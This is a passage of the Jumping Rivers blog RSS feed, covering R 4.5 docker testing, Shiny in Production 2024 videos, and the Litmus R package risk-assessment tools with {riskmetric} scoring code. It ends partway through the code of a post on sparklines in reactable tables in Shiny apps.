&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Once R 4.5 is the released version of R and the &lt;code&gt;r-docker&lt;/code&gt; repository
has been updated, you can use the following commands to test out R
4.5:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker pull rstudio/r-base:4.5-jammy
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;docker run --rm -it rstudio/r-base:4.5-jammy
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;An alternative way to install multiple versions of R on the same machine
is using &lt;a href="https://github.com/r-lib/rig" rel="external"&gt;&lt;code&gt;rig&lt;/code&gt;&lt;/a&gt;.&lt;/p&gt;
&lt;h3 id="see-also"&gt;See also&lt;/h3&gt;
&lt;p&gt;The R 4.x versions have introduced a wealth of interesting changes.
These have been summarised in our earlier blog posts:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/r-version-4-features/" rel="external"&gt;R 4.0.0&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/new-features-r410-pipe-anonymous-functions/" rel="external"&gt;R
4.1.0&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/new-features-r420/" rel="external"&gt;R 4.2.0&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/whats-new-r43/" rel="external"&gt;R 4.3.0&lt;/a&gt;&lt;/li&gt;
&lt;li&gt;&lt;a href="https://www.jumpingrivers.com/blog/whats-new-r44/" rel="external"&gt;R 4.4.0&lt;/a&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/whats-new-r45/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Shiny in Production 2024 Videos</title><link>https://www.jumpingrivers.com/blog/sip-2024-videos/</link><pubDate>Tue, 08 Apr 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/sip-2024-videos/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/sip-2024-videos/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/sip-2024-videos/featured.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;style&gt;
@import url('https://fonts.googleapis.com/css2?family=Besley:ital,wght@0,400..900;1,400..900&amp;display=swap');
select {
width: 100%;
}
[id="video-container"] select {
margin-bottom: 0.5rem;
}
[id="video-container"] .iframe-wrapper {
width: 100%;
border: 1vw solid #28282B;
border-bottom-width: 3vw;
position: relative;
}
[id="video-container"] .iframe-wrapper::before {
content: "SHINY";
font-family: "Besley", serif;
font-weight: bold;
letter-spacing: 2px;
position: absolute;
left: 50%;
bottom: 0%;
font-size: 1.25vw;
transform: translateX(-50%) translateY(2.5vw);
color: silver;
}
[id="video-container"] .iframe-wrapper::after {
content: "";
width: 1vw;
height: 1vw;
position: absolute;
left: 98%;
bottom: 0%;
transform: translateX(-50%) translateY(2vw);
background-color: rgba(255, 0, 0, 0.5);
border-radius: 50%;
}
[id="video-container"] iframe {
width: 100%;
aspect-ratio: 16 / 9;
display: block;
background-color: #28282B;
}
[id="video-container"] .stand {
width: 30%;
height: 3vw;
margin: 0 auto;
background-color: #28282B;
}
&lt;/style&gt;
&lt;script src="https://www.jumpingrivers.com/blog/sip-2024-videos/assets/script.mjs" type="module"&gt;&lt;/script&gt;
&lt;h2 id="2024-videos"&gt;2024 Videos&lt;/h2&gt;
&lt;p&gt;Considering a ticket for Shiny in Production 2025 but unsure what to expect? Maybe you attended in past years but missed out in 2024, or you simply want a refresher on last year’s highlights. Whatever the case, the video player below has you covered!&lt;/p&gt;
&lt;p&gt;Explore six in-depth talks, four lightning talks, and a bonus talk from Shiny in Production 2024&amp;hellip; or binge-watch them all!&lt;/p&gt;
&lt;div id="video-container"&gt;
&lt;select aria-label="Pick a video"&gt;&lt;/select&gt;
&lt;div class="iframe-wrapper"&gt;
&lt;iframe title="Shiny in Production 2024 Video Player" frameborder="0" allow="accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share" referrerpolicy="strict-origin-when-cross-origin" allowfullscreen&gt;&lt;/iframe&gt;
&lt;/div&gt;
&lt;div class="stand"&gt;&lt;/div&gt;
&lt;/div&gt;
&lt;h2 id="details-for-2025"&gt;Details for 2025&lt;/h2&gt;
&lt;p&gt;Feeling inspired after watching the videos? Great news—you can join us for Shiny in Production 2025!&lt;/p&gt;
&lt;p&gt;This year&amp;rsquo;s conference takes place on October 8th–9th, and as of now, &lt;strong&gt;early-bird tickets are still available&lt;/strong&gt;. Stay updated on workshops, speakers, and other key details on our dedicated &lt;a href="https://shiny-in-production.jumpingrivers.com/" rel="external"&gt;Shiny in Production 2025 site&lt;/a&gt;, or &lt;a href="https://www.eventbrite.co.uk/e/shiny-in-production-2025-registration-1035155587227" rel="external"&gt;grab your tickets on Eventbrite&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;As with the 2024 event, there will also be a satellite R Dev Day starting the afternoon before the conference. Here you can join others making contributions to base R or to infrastructure that supports such contributions. Read organiser Heather Turner&amp;rsquo;s &lt;a href="https://www.jumpingrivers.com/blog/r-dev-day-2024/"&gt;blog post about the 2024 event&lt;/a&gt; to get an idea of what to expect.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/sip-2024-videos/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Visualising R Package Risk Assessments using Litmus</title><link>https://www.jumpingrivers.com/blog/litmus-dashboard/</link><pubDate>Mon, 07 Apr 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/litmus-dashboard/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/litmus-dashboard/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/litmus-dashboard/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;A few years ago, we started working with a global pharma company who brought us a particularly thorny challenge. They wanted to use R for FDA submissions—but every package they introduced had to pass through a slow, resource-intensive process to be risk assessed and approved. They&amp;rsquo;re sadly unable to be gung-ho about what R tooling they use, needing instead to be thoughtful and meticulous, considering the statistical rigour, reproducibility, stability and security before including the tools in their production environment. In practice, this meant that it would take up to &lt;strong&gt;two years&lt;/strong&gt; for them to be able to approve a new R package for use. Ouch.&lt;/p&gt;
&lt;p&gt;After performing an audit of their process, we identified a few areas where we could create efficiencies. Our goal: automate everything that could be automated, reducing the manual burden on reviewers while improving consistency and traceability. Development began in earnest last year, and the result is the &lt;a href="https://www.jumpingrivers.com/litmus/" rel="external"&gt;Litmusverse&lt;/a&gt;, a suite of R packages that allows us to risk assess your R package collection, report on the findings and rescue high-risk packages that are business-critical.&lt;/p&gt;
&lt;p&gt;Everything is then packaged into one easy-to-use &lt;a href="https://litmus-dashboard.jmpr.io/" rel="external"&gt;application&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="does-your-package-pass-the-litmus-test"&gt;Does your package pass the {litmus} test?&lt;/h2&gt;
&lt;p&gt;What is the &lt;a href="https://www.jumpingrivers.com/litmus/" rel="external"&gt;Litmusverse&lt;/a&gt;? {litmus} grabs your R package metadata and generates valuable quality insights. {litmus.score} transforms these outputs into targeted quality scores—code, documentation, popularity, maintenance—plus an overall package rating. {litmus.report} delivers this intelligence in PDFs for permanent records. {litmus.dashboard} offers a comprehensive overview, empowering R library managers with better decision-making tools and streamlined record-keeping.&lt;/p&gt;
&lt;p&gt;Our approach is agnostic regarding the package source - it doesn’t matter if your package is hosted on CRAN, Bioconductor or an internal repository. We can risk assess and remediate it all the same. You can read more about our approach to risk assessment in a recent &lt;a href="https://www.jumpingrivers.com/blog/should-i-use-your-r-pkg/" rel="external"&gt;blog post&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;Our aim is to help clients curate a risk-assessed collection of packages, to continue driving innovation using R. Keep an eye out for upcoming blog posts outlining the details of our approach. In the meantime…&lt;/p&gt;
&lt;h2 id="give-our-dashboard-a-spin"&gt;Give our dashboard a spin!&lt;/h2&gt;
&lt;p&gt;We have prepared a &lt;a href="https://litmus-dashboard.jmpr.io/" rel="external"&gt;Shiny app&lt;/a&gt; that allows you to interact with a collection of packages that we have assessed and scored, using {litmus} tools and our new scoring strategy. We’ll be publishing more details about our approach to scoring in the coming weeks.
In the &lt;a href="https://litmus-dashboard.jmpr.io/" rel="external"&gt;app&lt;/a&gt;, you will be able to assess the high-level qualities of a package collection, including the distribution of scores:&lt;/p&gt;
&lt;img src="overview.png" alt="Litmus dashboard showing distribution of overall package scores" style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;If you click on &amp;lsquo;Package List&amp;rsquo; you&amp;rsquo;ll be able to see the collection&amp;rsquo;s metrics in a detailed, sortable table:&lt;/p&gt;
&lt;img src="table.png" alt="Table containing all metrics for package collection" style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;If you click on an individual row in this table, it will take you through to a detailed breakdown for the individual package, providing an overview of its score within the collection:&lt;/p&gt;
&lt;img src="pkg-view.png" alt="overview of a single package" style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;p&gt;You can also drill down into a visual representation of each feature within the context of the collection of packages:&lt;/p&gt;
&lt;img src="metric-view.png" alt="overview of a package's metrics in detail" style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;h2 id="ready-to-put-your-packages-to-the-test"&gt;Ready to put your packages to the test?&lt;/h2&gt;
&lt;p&gt;The free version of our &lt;a href="https://litmus-dashboard.jmpr.io/" rel="external"&gt;app&lt;/a&gt; allows you to view a subset of CRAN packages. If you are keen to unlock the full potential of Litmus (customising the package list that is displayed, including your own internally developed or non-CRAN packages, recording decisions about including a package in your environment, retrieving PDF reports for long-term storage, and remediating business-critical packages), we&amp;rsquo;re ready to help.&lt;/p&gt;
&lt;p&gt;Get in touch with us to discuss how we can help you curate a robust R ecosystem using the Litmusverse. As official Posit partners, we are also at the ready to assist you with setting up your ideal R development environment. For more information about our other Data Science and Data Engineering services, please visit the &lt;a href="https://www.jumpingrivers.com/" rel="external"&gt;Jumping Rivers website&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;To find out more about how we can facilitate your organisation’s adoption of open-source, please contact us.
&lt;a href="https://www.jumpingrivers.com/contact" class="buttony-link" data-subject="Litmus"&gt;&lt;span&gt;Contact Us&lt;/span&gt;&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/litmus-dashboard/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Should I Use Your R Package?</title><link>https://www.jumpingrivers.com/blog/should-i-use-your-r-pkg/</link><pubDate>Mon, 31 Mar 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/should-i-use-your-r-pkg/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/should-i-use-your-r-pkg/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/should-i-use-your-r-pkg/featured.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;The answer to this simple, innocuous question is: &lt;strong&gt;it depends.&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;It depends on the package in question, of course. Perhaps less obviously, but just as importantly, it depends on who&amp;rsquo;s asking the question.&lt;/p&gt;
&lt;p&gt;We&amp;rsquo;re sure that if we asked you about &amp;ldquo;package quality&amp;rdquo;, we would all come up with a similar list of what makes a good package:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Documentation&lt;/li&gt;
&lt;li&gt;Unit tests&lt;/li&gt;
&lt;li&gt;Author credibility&lt;/li&gt;
&lt;li&gt;Does the package have a web page?&lt;/li&gt;
&lt;li&gt;Security vulnerabilities&lt;/li&gt;
&lt;li&gt;Bug closure rate&lt;/li&gt;
&lt;li&gt;Are there multiple maintainers?&lt;/li&gt;
&lt;li&gt;Does the package have any reverse dependencies?&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;We could (and have) come up with another twenty of these attributes. With 95% confidence, we&amp;rsquo;re sure that most people would agree that everything we&amp;rsquo;ve thought of is important. But with 100% confidence, we are certain we would disagree on how much weight each of these characteristics deserves. Surely, unit testing is more important than the popularity of the package? But how important is the documentation quality relative to the number of maintainers?&lt;/p&gt;
&lt;p&gt;It all depends on why we are asking. It&amp;rsquo;s all about your risk appetite.&lt;/p&gt;
&lt;h2 id="what-is-risk-appetite"&gt;What is Risk Appetite?&lt;/h2&gt;
&lt;p&gt;Risk appetite is all about the risks you are and aren&amp;rsquo;t willing to take. It ranges from &amp;ldquo;Our packages need to be vaguely sensible, not compromise our system and have a place where I can log bugs&amp;rdquo; to &amp;ldquo;if our packages aren&amp;rsquo;t thoroughly tested and proven to be fit for purpose, I can&amp;rsquo;t use them in production&amp;rdquo;. The former is fairly easy to report on, whereas the latter is quite a bit more complicated.&lt;/p&gt;
&lt;img src="risk-appetite.png" alt="R users risk appetite from least to most risk averse" style="width: 400px; display: block; margin-left: auto; margin-right: auto"/&gt;
&lt;h2 id="the-risk-seekers"&gt;The Risk Seekers!&lt;/h2&gt;
&lt;p&gt;Who amongst us wouldn&amp;rsquo;t want a top-quality R package? Who are the risk seekers? Most of us, at some point or another. If you are experimenting with building Shiny applications, as long as the package is &amp;ldquo;secure&amp;rdquo;, any old package is fine - you just want to experiment. Likewise, if you are an academic and you want to compare your method to one already published, as long as the package is &amp;ldquo;correct&amp;rdquo;, that&amp;rsquo;s good enough.&lt;/p&gt;
&lt;p&gt;During our training courses, we are often asked this question about quality. How bad can a package be and still be usable? A thought experiment we like to do is &amp;ldquo;suppose you had an R package, with only one version. It has never been updated, and no one has heard from the maintainer in ten years. But it provides code for an algorithm you want to use. What would you do?&amp;rdquo; The obvious answer for those who have a high risk appetite is &amp;ldquo;something is better than nothing&amp;rdquo; and &amp;ldquo;proceed with caution&amp;rdquo;.&lt;/p&gt;
&lt;h2 id="risk-averse"&gt;Risk Averse&lt;/h2&gt;
&lt;p&gt;There are lots of examples of where we are (and should be) risk-averse when it comes to R packages. For example:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;In the pharmaceutical industry, we need reassurance that the statistics used in reporting are correct. It&amp;rsquo;s vital that these packages are highly regulated!&lt;/li&gt;
&lt;li&gt;Accuracy and stability are crucial for official Government reports on the state of the economy. A minor bug could have significant consequences.&lt;/li&gt;
&lt;li&gt;Banks also work in a regulated environment, running complex models, so have to be careful about the accuracy of their data.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Another crucial aspect is that these organisations not only need to consider which packages they are using, but must also demonstrate this thinking in an auditable manner. This is not dissimilar to the ISO 9001 process. In the context of the pharmaceutical industry, the holy grail is using R packages in FDA submissions for new therapies.&lt;/p&gt;
&lt;h2 id="the-r-validation-hub-is-paving-the-way"&gt;The R Validation Hub is Paving the Way&lt;/h2&gt;
&lt;p&gt;The pharmaceutical industry is the first to address these requirements in a meaningful way. The R Validation Hub put out a &lt;a href="https://www.pharmar.org/white-paper/" rel="external"&gt;white paper&lt;/a&gt; which addresses the use of R and its packages for statistical analysis in pharmaceutical regulatory submissions, proposing a risk-based approach for validating R packages within validated infrastructure. The paper suggests that base R packages present minimal risk, whilst contributed packages require risk assessment based on their purpose, maintenance practices, community usage, and testing protocols.&lt;/p&gt;
&lt;p&gt;The proposed framework classifies packages as either &amp;ldquo;Intended for Use&amp;rdquo; (loaded directly by users) or &amp;ldquo;Imports&amp;rdquo; (supporting dependencies), focusing validation efforts primarily on the former. Risk assessment should evaluate whether packages are statistical or non-statistical in nature, examine development practices, consider community adoption metrics, and review testing coverage. Organisations can use this assessment to determine package inclusion in validated systems and identify additional testing requirements, with high-risk packages needing more rigorous validation.&lt;/p&gt;
&lt;p&gt;The approach required for those not working in regulated industries will probably not need to be as stringent as this, but it gives an idea of what the gold standard for R package validation should be, and we can draw inspiration from it for less strict applications. The R Validation Hub has also created some helpful tools, like {riskmetric}, which allows us to pull metadata about packages and create quality scores from these data.&lt;/p&gt;
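&lt;p&gt;As a rough illustration of what pulling and scoring this metadata can look like, here is a minimal sketch using the &lt;code&gt;pkg_ref()&lt;/code&gt;, &lt;code&gt;pkg_assess()&lt;/code&gt; and &lt;code&gt;pkg_score()&lt;/code&gt; functions from {riskmetric}. The two package names are arbitrary choices for illustration, and the metrics returned will depend on the {riskmetric} version installed and on where the package information is sourced from.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;library(dplyr)
library(riskmetric)

# Package names chosen purely for illustration
scores = pkg_ref(c(&amp;#34;riskmetric&amp;#34;, &amp;#34;utils&amp;#34;)) |&amp;gt;
  as_tibble() |&amp;gt;   # one row per package reference
  pkg_assess() |&amp;gt;  # run the available assessments
  pkg_score()      # convert each assessment to a numeric score

scores
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;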
&lt;h2 id="how-do-we-enable-risk-assessment-for-everyone-across-the-risk-spectrum"&gt;How Do We Enable Risk Assessment for Everyone Across the Risk Spectrum?&lt;/h2&gt;
&lt;p&gt;This is the question we have been grappling with over the past few months. How do we gather all of the information required to make informed decisions about including packages in production environments, using a flexible framework that meets the needs of everyone on the risk appetite spectrum? Especially considering…&lt;/p&gt;
&lt;p&gt;&lt;strong&gt;There are so many packages on CRAN!&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;This is both a blessing and a curse, as anyone who&amp;rsquo;s ever worked in a regulated environment can tell you. The obvious answer is to automate, automate, automate! This is exactly what we&amp;rsquo;ve done in the creation of the &lt;a href="https://www.jumpingrivers.com/litmus/" rel="external"&gt;Litmus&lt;/a&gt; package validation framework.&lt;/p&gt;
&lt;p&gt;Our process relies on automation wherever possible:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;We have written code based on {riskmetric} that pulls package metadata from CRAN, git repositories and Posit Package Manager to provide a comprehensive overview of the package&amp;rsquo;s qualities&lt;/li&gt;
&lt;li&gt;We have created a framework to analyse and score packages based on these data&lt;/li&gt;
&lt;li&gt;We have created reporting and dashboarding workflows that allow us to generate package- and collection-level overviews of the scores for each package&lt;/li&gt;
&lt;li&gt;We&amp;rsquo;ve implemented automatic acceptance/rejection of a package based on client-specified criteria&lt;/li&gt;
&lt;li&gt;Our process also enables automated reporting of any additional manual steps taken to save a package from the bin, for example writing additional remedial tests or documentation&lt;/li&gt;
&lt;/ul&gt;
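&lt;p&gt;To make the idea of automatic acceptance/rejection a little more concrete, here is a small base R sketch. It is not the Litmus implementation: the package names, metric names, scores and thresholds are all hypothetical, and the rule used (every metric must meet its minimum) is just one simple assumption about what client-specified criteria could look like.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;# Hypothetical scores between 0 and 1 for three made-up packages
scores = data.frame(
  package = c(&amp;#34;pkgA&amp;#34;, &amp;#34;pkgB&amp;#34;, &amp;#34;pkgC&amp;#34;),
  unit_tests = c(0.9, 0.4, 0.8),
  documentation = c(0.8, 0.9, 0.3),
  maintenance = c(0.7, 0.6, 0.9)
)

# Hypothetical client-specified minimum for each metric
thresholds = c(unit_tests = 0.5, documentation = 0.5, maintenance = 0.5)

# Compare each metric column against its own threshold
meets = sweep(as.matrix(scores[names(thresholds)]), 2, thresholds, &amp;#34;&amp;gt;=&amp;#34;)

# A package is accepted only if every metric meets its threshold
scores$accepted = apply(meets, 1, all)

scores[, c(&amp;#34;package&amp;#34;, &amp;#34;accepted&amp;#34;)]
&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;A stricter risk appetite then amounts to raising the thresholds or adding metrics, without changing the rest of the code.&lt;/p&gt;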
&lt;p&gt;Keep an eye out for future blogs on this topic, as we dive a little deeper into the underlying principles driving our approach to package validation.&lt;/p&gt;
&lt;h2 id="does-your-package-pass-the-litmus-test"&gt;Does Your Package Pass the Litmus Test?&lt;/h2&gt;
&lt;p&gt;Ready to find out how we can help you validate your R package collection? Check out the &lt;a href="https://www.jumpingrivers.com/litmus/" rel="external"&gt;Litmusverse&lt;/a&gt; and &lt;a href="https://www.jumpingrivers.com/contact/" rel="external"&gt;get in touch&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/should-i-use-your-r-pkg/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>Sparklines in Reactable Tables in Shiny Apps</title><link>https://www.jumpingrivers.com/blog/sparkline-reactable-shiny/</link><pubDate>Thu, 27 Mar 2025 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/sparkline-reactable-shiny/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/sparkline-reactable-shiny/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/sparkline-reactable-shiny/header.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;This is the third blog in a series about the {sparkline} R package for
inline data visualisations. You can read the first one about getting
started with the package
&lt;a href="https://www.jumpingrivers.com/blog/sparkline/" rel="external"&gt;here&lt;/a&gt; and the second one
about embedding them in HTML tables with the {reactable} package
&lt;a href="https://www.jumpingrivers.com/blog/sparkline-reactable/" rel="external"&gt;here.&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;In this blog I am taking it a step further and demonstrating how to use
our sparkline reactable table in a &lt;a href="https://shiny.posit.co/" rel="external"&gt;Shiny app.&lt;/a&gt;
Thankfully {reactable} has some helpful functions that make this super
easy! I will also look at using a dynamic traffic light image in a
reactable table at the end.&lt;/p&gt;
&lt;h2 id="reactable-sparkline-table"&gt;Reactable Sparkline Table&lt;/h2&gt;
&lt;p&gt;I’m going to start where we ended the last blog. The following code
creates a {reactable} table from some randomly generated data, with a few
{sparkline} visualisations in the columns.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(sparkline)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(reactable)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(dplyr)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;data &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;tibble&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; names &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;x&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;y&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;z&amp;#34;&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;c&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;rnorm&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;)), &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;rnorm&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;)), &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(&lt;span style="color:#d2a8ff;font-weight:bold"&gt;rnorm&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;10&lt;/span&gt;)))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ) &lt;span style="color:#ff7b72;font-weight:bold"&gt;|&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;mutate&lt;/span&gt;(box &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; line &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; bar &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;NA&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;table &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;reactable&lt;/span&gt;(data,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; columns &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; values &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;colDef&lt;/span&gt;(show &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; box &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;colDef&lt;/span&gt;(cell &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(value, index) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sparkline&lt;/span&gt;(data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;values[[index]], type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;box&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; line &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;colDef&lt;/span&gt;(cell &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;function&lt;/span&gt;(value, index) {
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;sparkline&lt;/span&gt;(data&lt;span style="color:#ff7b72;font-weight:bold"&gt;$&lt;/span&gt;values[[index]], type &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;line&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; }),
